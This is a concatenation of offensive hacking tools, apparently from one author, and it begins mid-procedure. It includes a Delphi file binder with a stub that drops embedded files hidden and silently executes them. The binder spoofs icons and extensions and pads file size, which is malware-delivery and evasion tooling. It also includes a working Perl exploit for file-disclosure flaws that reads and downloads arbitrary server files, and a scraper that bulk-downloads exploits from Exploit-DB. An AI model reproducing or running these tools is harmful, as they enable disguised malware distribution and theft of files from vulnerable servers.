opcionocultar := '1';
end
else
begin
opcionocultar := '0';
end;
if (extraction.Items[extraction.ItemIndex] = '') then
begin
savein := 'USERPROFILE';
end
else
begin
savein := extraction.Items[extraction.ItemIndex];
end;
DeleteFile(stubgenerado);
CopyFile(PChar(ExtractFilePath(Application.ExeName) + '/' +
'Data/stub.exe'), PChar(ExtractFilePath(Application.ExeName) + '/' +
stubgenerado), True);
ruta_archivo := ExtractFilePath(Application.ExeName) + '/' + stubgenerado;
uno := BeginUpdateResource(PChar(ruta_archivo), True);
for i := 0 to files.Items.Count - 1 do
begin
nombre := files.Items[i].Caption;
ruta := files.Items[i].SubItems[0];
tipo := files.Items[i].SubItems[2];
lineafinal := '[nombre]' + nombre + '[nombre][tipo]' + tipo +
'[tipo][dir]' + savein + '[dir][hide]' + opcionocultar + '[hide]';
lineafinal := '[63686175]' + dhencode(UpperCase(lineafinal), 'encode') +
'[63686175]';
dos := CreateFile(PChar(ruta), GENERIC_READ, FILE_SHARE_READ, nil,
OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
tam := GetFileSize(dos, nil);
GetMem(todo, tam);
ReadFile(dos, todo^, tam, tres, nil);
CloseHandle(dos);
UpdateResource(uno, RT_RCDATA, PChar(lineafinal),
MAKEWord(LANG_NEUTRAL, SUBLANG_NEUTRAL), todo, tam);
end;
EndUpdateResource(uno, False);
end;
//
if (check_filepumper.Checked) then
begin
tipocantidadz := pumper_type.Items[pumper_type.ItemIndex];
if (tipocantidadz = 'Byte') then
begin
file_pumper(ruta_archivo, StrToInt(pumper_count.Text) * 8);
end;
if (tipocantidadz = 'KiloByte') then
begin
file_pumper(ruta_archivo, StrToInt(pumper_count.Text) * 1024);
end;
if (tipocantidadz = 'MegaByte') then
begin
file_pumper(ruta_archivo, StrToInt(pumper_count.Text) * 1048576);
end;
if (tipocantidadz = 'GigaByte') then
begin
file_pumper(ruta_archivo, StrToInt(pumper_count.Text) * 1073741824);
end;
if (tipocantidadz = 'TeraByte') then
begin
file_pumper(ruta_archivo, StrToInt(pumper_count.Text) * 1099511627776);
end;
end;
if (use_icon_changer.Checked) then
begin
try
begin
change := BeginUpdateResourceW
(PWideChar(wideString(ruta_archivo)), False);
LoadIconGroupResourceW(change, PWideChar(wideString(valor)), 0,
PWideChar(wideString(ruta_icono.Text)));
EndUpdateResourceW(change, False);
end;
except
begin
//
end;
end;
end;
if (check_extension_changer.Checked) then
begin
if not(check_extension.Checked and check_this_extension.Checked) then
begin
if (check_extension.Checked) then
begin
extensionacambiar := extensiones.Items[extensiones.ItemIndex];
extension_changer(ruta_archivo, extensionacambiar);
end;
if (check_this_extension.Checked) then
begin
extension_changer(ruta_archivo, extension.Text);
end;
end;
end;
StatusBar1.Panels[0].Text := '[+] Done';
Form1.StatusBar1.Update;
end;
procedure TForm1.C1Click(Sender: TObject);
begin
files.Clear;
imagenes.Clear;
end;
procedure TForm1.D1Click(Sender: TObject);
begin
files.DeleteSelected;
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
abrir.InitialDir := GetCurrentDir;
abrir_icono.InitialDir := GetCurrentDir;
abrir_icono.Filter := 'ICO|*.ico|';
end;
end.
// The End ?
// DH Binder 1.0
// (C) Doddy Hackman 2015
// Credits :
// Joiner Based in : "Ex Binder v0.1" by TM
// Icon Changer based in : "IconChanger" By Chokstyle
// Thanks to TM & Chokstyle
program stub;
uses
System.SysUtils, ShellApi, Windows;
function regex(text: String; deaca: String; hastaaca: String): String;
begin
Delete(text, 1, AnsiPos(deaca, text) + Length(deaca) - 1);
SetLength(text, AnsiPos(hastaaca, text) - 1);
Result := text;
end;
function dhencode(texto, opcion: string): string;
// Thanks to Taqyon
// Based on http://www.vbforums.com/showthread.php?346504-DELPHI-Convert-String-To-Hex
var
num: integer;
aca: string;
cantidad: integer;
begin
num := 0;
Result := '';
aca := '';
cantidad := 0;
if (opcion = 'encode') then
begin
cantidad := Length(texto);
for num := 1 to cantidad do
begin
aca := IntToHex(ord(texto[num]), 2);
Result := Result + aca;
end;
end;
if (opcion = 'decode') then
begin
cantidad := Length(texto);
for num := 1 to cantidad div 2 do
begin
aca := Char(StrToInt('$' + Copy(texto, (num - 1) * 2 + 1, 2)));
Result := Result + aca;
end;
end;
end;
procedure cargar_archivo(archivo: TFileName; tipo: string);
var
data: SHELLEXECUTEINFO;
begin
if (FileExists(archivo)) then
begin
ZeroMemory(@data, SizeOf(SHELLEXECUTEINFO));
data.cbSize := SizeOf(SHELLEXECUTEINFO);
data.fMask := SEE_MASK_NOCLOSEPROCESS;
data.Wnd := 0;
data.lpVerb := 'open';
data.lpFile := PChar(archivo);
if (tipo = 'Show') then
begin
data.nShow := SW_SHOWNORMAL;
end;
if (tipo = 'Hide') then
begin
data.nShow := SW_HIDE;
end;
if not ShellExecuteEx(@data) then
if GetLastError <= 32 then
begin
SysErrorMessage(GetLastError);
end;
end;
end;
//
// Start the game
function start(tres: THANDLE; cuatro, cinco: PChar; seis: DWORD): BOOL; stdcall;
var
data: DWORD;
uno: DWORD;
dos: DWORD;
cinco2: string;
nombre: string;
tipodecarga: string;
ruta: string;
ocultar: string;
begin
Result := True;
cinco2 := cinco;
cinco2 := regex(cinco2, '[63686175]', '[63686175]');
cinco2 := dhencode(cinco2, 'decode');
cinco2 := LowerCase(cinco2);
nombre := regex(cinco2, '[nombre]', '[nombre]');
tipodecarga := regex(cinco2, '[tipo]', '[tipo]');
ruta := GetEnvironmentVariable(regex(cinco2, '[dir]', '[dir]')) + '/';
ocultar := regex(cinco2, '[hide]', '[hide]');
if not(tipodecarga = '') then
begin
data := FindResource(0, cinco, cuatro);
uno := CreateFile(PChar(ruta + nombre), GENERIC_WRITE, FILE_SHARE_WRITE,
nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
WriteFile(uno, LockResource(LoadResource(0, data))^,
SizeOfResource(0, data), dos, nil);
CloseHandle(uno);
if (ocultar = '1') then
begin
SetFileAttributes(PChar(ruta + nombre), FILE_ATTRIBUTE_HIDDEN);
end;
if (tipodecarga = 'normal') then
begin
// Writeln('Abriendo normal');
cargar_archivo(ruta + nombre, 'Show');
end;
if (tipodecarga = 'hide') then
begin
// Writeln('Abriendo oculto');
cargar_archivo(ruta + nombre, 'Hide');
end;
end;
end;
begin
EnumResourceNames(0, RT_RCDATA, @start, 0);
end.
// The End ?
#!usr/bin/perl
#FSD Exploit Manager 0.6
#(C) Doddy Hackman 2014
use Getopt::Long;
use Color::Output;
Color::Output::Init;
use LWP::UserAgent;
use URI::Split qw(uri_split);
use File::Basename;
use Cwd;
my $nave = LWP::UserAgent->new();
$nave->agent( $agents[ rand @agents ] );
$nave->timeout(5);
installer();
GetOptions(
"scan=s" => \$scan,
"fpd" => \$fpd,
"logs" => \$logs,
"open" => \$open
);
head();
if ($scan) {
my $page = $scan;
printear("\n[+] Scanning target : ");
print $page. "\n\n";
my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
my $me = basename($path);
$code1 = toma( $page . $me );
if ( $code1 =~ /header\((.*)Content-Disposition: attachment;/ig ) {
printear_titulo("[+] Vulnerable\n");
$code2 = toma( $page . "'" );
if ( $code2 =~ /No such file or directory in <b>(.*)<\/b> on line/
or $code2 =~
/No existe el fichero o el directorio in <b>(.*)<\/b> on line/ )
{
my $ruta = $1;
my $cambiar = basename($ruta);
$ruta =~ s/$cambiar//;
my $prompt = "";
if ($fpd) {
printear("\n[+] Full Path Dislocure Detect : ");
print $ruta. "\n";
$prompt = "[" . $ruta . "] > ";
}
else {
$prompt = "[prompt] > ";
}
unless ( -d $auth ) {
mkdir( $auth, "0777" );
chmod 0777, $auth;
}
chdir($auth);
printear("\n[+] File Downloader : ");
print "Ready\n";
while (1) {
$SIG{INT} = \&adios;
printear_titulo( "\n" . $prompt );
chomp( my $comando = <stdin> );
if ( $comando =~ /!exit/ ) {
adios();
}
elsif ( $comando =~ /!read_file (.*)/ ) {
my $archivo = $1;
my $code = "";
my $code = toma( $page . $archivo );
printear_logo(
"\n----------------------------------------------------\n"
);
printear_titulo($code);
printear_logo(
"\n----------------------------------------------------\n"
);
}
elsif ( $comando =~ /!download_file (.*)/ ) {
my $archivo = $1;
my $nombre = basename($archivo);
printear_titulo("\n[+] Downloading file : ");
print $nombre. "\n";
if ( $nave->mirror( $page . $archivo, $nombre ) ) {
printear("\n[+] File Downloaded\n");
if ($open) {
my $abrir = getcwd() . "/" . $nombre;
if ( -f $abrir ) {
abrir_archivo($abrir);
}
if ( !defined($logs) ) {
if ( -f $abrir ) {
unlink($abrir);
}
}
}
}
else {
printear("\n[-] File not downloaded\n");
}
}
elsif ( $comando =~ /!help/ ) {
printear( "\n[+] Commands : " . "\n\n" );
printear("!download_file <file> : Download file\n");
printear("!read_file <file> : Read File\n");
printear("!help : Show commands\n");
printear("!exit : To exit the program\n");
}
else {
printear("\n[-] Command not found , try using !help\n");
}
}
}
}
else {
printear_titulo("[-] Not vulnerable\n");
}
}
else {
sintax();
}
copyright();
sub abrir_archivo {
my $os = $^O;
if ( $os =~ /Win32/ig ) {
system(qq(notepad.exe "$_[0]"));
}
else {
system(qq(gedit '$_[0]'));
}
}
sub printear {
cprint( "\x036" . $_[0] . "\x030" );
}
sub printear_logo {
cprint( "\x037" . $_[0] . "\x030" );
}
sub printear_titulo {
cprint( "\x0310" . $_[0] . "\x030" );
}
sub sintax {
printear("\n[+] Sintax : ");
print "perl $0 <option> <value>\n";
printear("\n[+] Options : \n\n");
print "-scan <page> : FSD Exploit Scanner\n";
print "-fpd : Check Full Path Discloure\n";
print "-logs : Enable logs to save files downloaded\n";
print "-open : Enable open files downloaded\n";
printear("\n[+] Example : ");
print "perl fsd.pl -scan http://localhost/download.php?down= -fpd -logs\n";
copyright();
}
sub installer {
unless ( -d "fsdlogs/" ) {
mkdir( "fsdlogs/", "777" );
chmod 0777, "fsdlogs/";
}
chdir("fsdlogs");
}
sub adios {
printear_titulo("\n\n[+] Good Bye\n");
copyright();
}
sub head {
printear_logo("\n-- == FSD Exploit Manager 0.6 == --\n\n");
}
sub copyright {
printear_logo("\n\n-- == (C) Doddy Hackman 2014 == --\n");
exit(1);
}
sub toma {
return $nave->get( $_[0] )->content;
}
#The End ?
#!usr/bin/perl
#Exploit DB Manager 0.6
#(C) Doddy Hackman 2015
use LWP::UserAgent;
use Getopt::Long;
use Color::Output;
Color::Output::Init;
my @agents = (
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0',
'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
'Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1',
'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
'Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27'
);
my $nave = LWP::UserAgent->new();
$nave->agent( $agents[ rand @agents ] );
$nave->timeout(5);
GetOptions(
"search=s" => \$search,
"page=i" => \$page,
"read_exploit=s" => \$read_exploit,
"download=s" => \$download,
"file=s" => \$file,
"download_all=s" => \$download_all
);
my $directorio_down = "downloads";
unless ( -d $directorio_down ) {
mkdir( $directorio_down, "0777" );
chmod 0777, $directorio_down;
}
chdir($directorio_down);
head();
if ( $search ne "" ) {
if ( $page eq "" ) {
by_search( $search, "1" );
}
else {
by_search( $search, $page );
}
}
elsif ( $read_exploit ne "" ) {
by_read_exploit($read_exploit);
}
elsif ($download) {
if ($file) {
by_download( $download, $file );
}
else {
by_download( $download, "" );
}
}
elsif ($download_all) {
if ( $page ne "" ) {
by_download_all( $download_all, $page );
}
else {
by_download_all( $download_all, "1" );
}
}
else {
sintax();
}
copyright();
sub by_download_all {
my $query = $_[0];
my $page = $_[1];
printear_titulo("\n[+] Searching ...\n\n");
my $directorio = $query;
$directorio =~ s/\.//;
$directorio =~ s/\=//;
unless ( -d $directorio ) {
mkdir( $directorio, "0777" );
chmod 0777, $directorio;
}
chdir($directorio);
my $code =
toma( "http://www.exploit-db.com/search/?action=search&filter_page="
. $page
. "&filter_description="
. $query
. "&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="
);
sleep(6);
my %links_to_download;
my @ids = "";
my @nombres = "";
my @links = "";
my @links_down = "";
while ( $code =~
/<a href="http:\/\/www.exploit-db.com\/exploits\/(.*?)">(.*?)<\/a>/migs
)
{
my $id = $1;
my $name = $2;
$name =~ s/<//;
$name =~ s/\<//;
$name =~ s/(\s)+$//;
my $link = "http://www.exploit-db.com/exploits/" . $id;
my $link_down = "http://www.exploit-db.com/download/" . $id;
push( @nombres, $name );
push( @ids, $id );
push( @links, $link );
push( @links_down, $link_down );
}
printear("[+] Exploits Found : ");
print int(@links) - 1 . "\n\n";
for my $num ( 1 .. int(@links) - 1 ) {
printear("[+] Title : ");
print $nombres[$num] . "\n";
printear("[+] Link : ");
print $links[$num] . "\n";
my $titulo = $nombres[$num];
$titulo =~ s/=//ig;
$titulo =~ s/\///ig;
$titulo = $titulo . ".txt";
printear("[+] Downloading ID : ");
print $ids[$num];
print "\n";
sleep(6);
if ( $nave->mirror( $links_down[$num], $titulo ) ) {
printear("[+] Status : ");
print "OK\n\n";
chmod 0777, $titulo;
}
else {
printear("[+] Status : ");
print "FAIL\n\n";
}
}
printear_titulo("[+] Finished\n");
}
sub by_download {
my $id = $_[0];
my $file = $_[1];
printear_titulo("\n[+] Downloading exploit ID : ");
print $id. "\n";
if ( $file ne "" ) {
if (
$nave->mirror(
"http://www.exploit-db.com/download/" . $id . "/", $file
)
)
{
printear( "\n[+] File '" . $file . "' Downloaded !\n" );
chmod 0777, $file;
}
else {
printear("\n[-] WTF !\n");
}
}
else {
my $code = toma( "http://www.exploit-db.com/exploits/" . $id . "/" );
if ( $code =~ /<h1 style="(.*?)">(.*?)<\/h1>/ ) {
my $titulo = $2;
my $exploit_name = $titulo;
$titulo =~ s/\.//;
$titulo =~ s/\=//;
$titulo = $titulo . ".txt";
sleep(6);
if (
$nave->mirror(
"http://www.exploit-db.com/download/" . $id . "/", $titulo
)
)
{
printear( "\n[+] File '" . $exploit_name . "' Downloaded !\n" );
chmod 0777, $titulo;
}
else {
printear("\n[-] WTF !\n");
}
}
}
}
sub by_read_exploit {
printear_titulo("\n[+] Searching ...\n\n");
my $id = $_[0];
my $code = toma( "http://www.exploit-db.com/exploits/" . $id . "/" );
my $source = toma( "http://www.exploit-db.com/download/" . $id . "/" );
if ( $code =~ /<h1 style="(.*?)">(.*?)<\/h1>/ ) {
my $titulo = $2;
printear("[+] Title : ");
print $titulo. "\n";
}
else {
printear("[-] WTF !\n");
}
if ( $code =~ /Author: (.*?)</ ) {
my $autor = $1;
printear("[+] Author : ");
print $autor. "\n";
}
if ( $code =~ /Published: (.*?)</ ) {
my $fecha = $1;
printear("[+] Published : ");
print $fecha. "\n";
}
if ( $code =~ /Vulnerable App: <a href="(.*?)">/ ) {
my $app = $1;
printear("[+] Vulnerable App : ");
print $app. "\n";
}
print "\n-------------------------------------\n";
printear($source);
print "-------------------------------------\n";
}
sub by_search {
my $query = $_[0];
my $page = $_[1];
printear_titulo("\n[+] Searching ...\n\n");
my $code =
toma( "http://www.exploit-db.com/search/?action=search&filter_page="
. $page
. "&filter_description="
. $query
. "&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="
);
my @dates = "";
my @nombres = "";
my @tipos = "";
my @autores = "";
my @links = "";
while ( $code =~ /<td class="list_explot_date">(.*?)<\/td>/migs ) {
my $date = $1;
push( @dates, $date );
}
while ( $code =~
/<a href="http:\/\/www.exploit-db.com\/exploits\/(.*?)">(.*?)<\/a>/migs
)
{
my $id = $1;
my $name = $2;
$name =~ s/<//;
my $link = "http://www.exploit-db.com/exploits/" . $id;
push( @nombres, $name );
push( @links, $link );
}
while ( $code =~
/<a href="http:\/\/www.exploit-db.com\/platform\/(.*?)">(.*?)<\/a>/migs
)
{
my $type = $2;
push( @tipos, $type );
}
while ( $code =~
/<a href="http:\/\/www.exploit-db.com\/author\/(.*?)" title="(.*?)">/migs
)
{
my $autor = $2;
push( @autores, $autor );
}
printear("[+] Exploits Found : ");
print int(@links) - 1 . "\n";
for my $num ( 1 .. int(@links) - 1 ) {
printear("\n[+] Title : ");
print $nombres[$num] . "\n";
printear("[+] Date : ");
print $dates[$num] . "\n";
printear("[+] Type : ");
print $tipos[$num] . "\n";
printear("[+] Author : ");
print $autores[$num] . "\n";
printear("[+] Link : ");
print $links[$num] . "\n";
}
}
sub printear {
cprint( "\x036" . $_[0] . "\x030" );
}
sub printear_logo {
cprint( "\x037" . $_[0] . "\x030" );
}
sub printear_titulo {
cprint( "\x0310" . $_[0] . "\x030" );
}
sub sintax {
printear("\n[+] Sintax : ");
print "perl $0 <option> <value>\n";
printear("\n[+] Options : \n\n");
print "-search <query> -page <count> : Search exploits in page\n";
print "-read_exploit <id exploit> : Read exploit\n";
print "-download <id exploit> : Download an exploit\n";
print "-download_all <query> -page <count> : Download all exploits\n";
printear("\n[+] Example : ");
print "perl exploitdb.pl -search smf -page 1\n";
copyright();
}
sub head {
printear_logo("\n-- == Exploit DB Manager 0.6 == --\n\n");
}
sub copyright {
printear_logo("\n\n-- == (C) Doddy Hackman 2015 == --\n\n");
exit(1);
}
sub toma {
return $nave->get( $_[0] )->content;
}
#The End ?
